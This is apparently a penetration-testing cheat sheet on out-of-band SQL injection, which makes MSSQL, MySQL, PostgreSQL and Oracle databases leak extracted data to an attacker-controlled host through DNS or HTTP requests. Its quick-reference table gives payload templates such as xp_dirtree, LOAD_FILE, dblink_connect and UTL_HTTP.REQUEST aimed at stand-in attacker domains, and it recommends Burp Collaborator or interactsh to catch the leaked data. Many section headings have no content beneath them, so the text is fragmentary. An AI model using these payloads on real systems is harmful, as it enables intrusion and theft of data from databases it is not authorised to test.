Overview
No visible output, no timing difference. Trigger the database to make an external request (DNS/HTTP) carrying extracted data. Requires: database can make outbound connections.MSSQL
DNS Exfiltration
HTTP via xp_cmdshell
OLE Automation
MySQL
DNS via LOAD_FILE (Windows Only)
INTO OUTFILE + HTTP
PostgreSQL
COPY to Program
dblink
DNS via Extension
Oracle
UTL_HTTP
UTL_INADDR (DNS)
HTTPURITYPE
Catch Requests
DNS — Burp Collaborator
Use Burp Collaborator or interactsh:data.BURP_COLLABORATOR_DOMAIN
HTTP — Simple Listener
Interactsh
abc123.interact.sh as ATTACKER_DOMAIN in payloads.
Quick Reference
| Database | Technique |
|---|---|
| MSSQL | xp_dirtree '\\data.DOMAIN\\x' |
| MySQL | LOAD_FILE('\\\\data.DOMAIN\\x') (Windows) |
| PostgreSQL | dblink_connect('host=data.DOMAIN') |
| Oracle | UTL_HTTP.REQUEST('http://ATTACKER/?d='...) |